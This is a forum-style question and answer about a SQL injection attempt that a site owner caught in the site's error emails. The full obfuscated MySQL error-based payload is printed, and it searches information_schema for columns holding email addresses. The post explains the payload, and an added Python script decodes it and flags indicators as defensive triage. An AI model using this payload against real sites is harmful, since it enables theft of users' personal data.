user3371970 - 1 year ago 80
SQL Question

What is the purpose of this sort of SQL injection?

I have a website. If there are errors, I send an email out to a system account. I saw the following today, which I assume was the SQL. I am going to have to put in a fix. Would anyone know what the person was trying to achieve by doing this?

AdID=50427 or 1=(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x25656d61696c25 and not t./**/tAbLe_nAmE in(0x42524944455f54424c,0x42524944455f54424c5f505542,0x434f4e54414354,0x434f4e544143545f54424c,0x47524f4f4d5f54424c,0x47524f4f4d5f54424c5f505542,0x4f524445525f54424c,0x7068703132315f75736572735f64656c65746564,0x535542534352494245525f4c495354,0x555345525f44454c45544544,0x555345525f50524f46494c455f44454c45544544) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 11,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 1=1

Answer Source

Specifically it is trying to find which non-system tables have a column containing email and is excluding the following tables:

BRIDE_PUB
BRIDE_TBL_PUB
CONTACT
CONTACT_TBL
GROOM_TBL
GROOM_TBL_PUB
ORDER_TBL
php121_users_deleted
SUBSCRIBER_LIST
USER_DELETED
USER_PROFILE_DELETED

Which I assume the attacker already knows about.

So basically they are trying to steal your email addresses to sell as mailing lists (this is typical for SQL injection attacks).
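As an added example (not part of the question or answer), the script below undoes the three obfuscation layers in the captured parameter, the `/**/` comments used as separators, the mixed-case keywords and the `0x..` string literals, so a defender can read what the attacker was actually asking for and flag the request. The sample value is a constructed, abbreviated copy of the parameter from the question; the site's URL and schema are not known.

```python
import re

# Constructed sample: an abbreviated copy of the AdID parameter from the question,
# keeping the obfuscation tricks (/**/ comments, mixed case, 0x.. string literals).
SAMPLE = (
    "AdID=50427 or 1=(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT(("
    "/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM "
    "information_schema./**/tAbLeS as t /**/wHeRe not t./**/tAbLe_sChEmA "
    "in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe "
    "like 0x25656d61696c25 and not t./**/tAbLe_nAmE in(0x42524944455f54424c,"
    "0x42524944455f54424c5f505542) /**/lImIt 11,1),floor(rand(0)*2))x "
    "/**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 1=1"
)

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)\b")

def decode_hex_literal(hexdigits):
    """Turn a MySQL 0x.. literal into the string it encodes (non-text stays as hex)."""
    if len(hexdigits) % 2:
        return "0x" + hexdigits
    try:
        return bytes.fromhex(hexdigits).decode("ascii")
    except UnicodeDecodeError:
        return "0x" + hexdigits

def hex_strings(value):
    """List every 0x.. literal in the value, decoded, in the order it appears."""
    return [decode_hex_literal(h) for h in HEX_LITERAL.findall(value)]

def normalize(value):
    """Rewrite the value the way the database engine reads it: comments gone,
    keywords lower-cased, hex literals shown as quoted strings."""
    text = re.sub(r"/\*.*?\*/", " ", value)       # /**/ is only a token separator
    text = text.lower()                            # case is irrelevant to the parser
    text = HEX_LITERAL.sub(lambda m: "'" + decode_hex_literal(m.group(1)) + "'", text)
    return re.sub(r"\s+", " ", text).strip()

# Indicators worth alerting on once the value has been normalised.  The
# floor(rand(0)*2) ... group by pairing is the classic error-based trick: the
# duplicate group key makes the server raise an error that carries the
# concatenated table name (the !~! markers delimit it) in its message.
SIGNALS = (
    ("information_schema", "schema enumeration"),
    ("floor(rand(0)*2)", "error-based extraction via duplicate group key"),
    ("%email%", "searching for email columns"),
)

def classify(value):
    """Return the labels of every indicator present in a request parameter value."""
    norm = normalize(value)
    return [label for needle, label in SIGNALS if needle in norm]
```

Since AdID is numeric, binding it as a query parameter (or rejecting anything that is not an integer) removes the injection point; the decoder is for triage of what was attempted, not a substitute for that fix.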
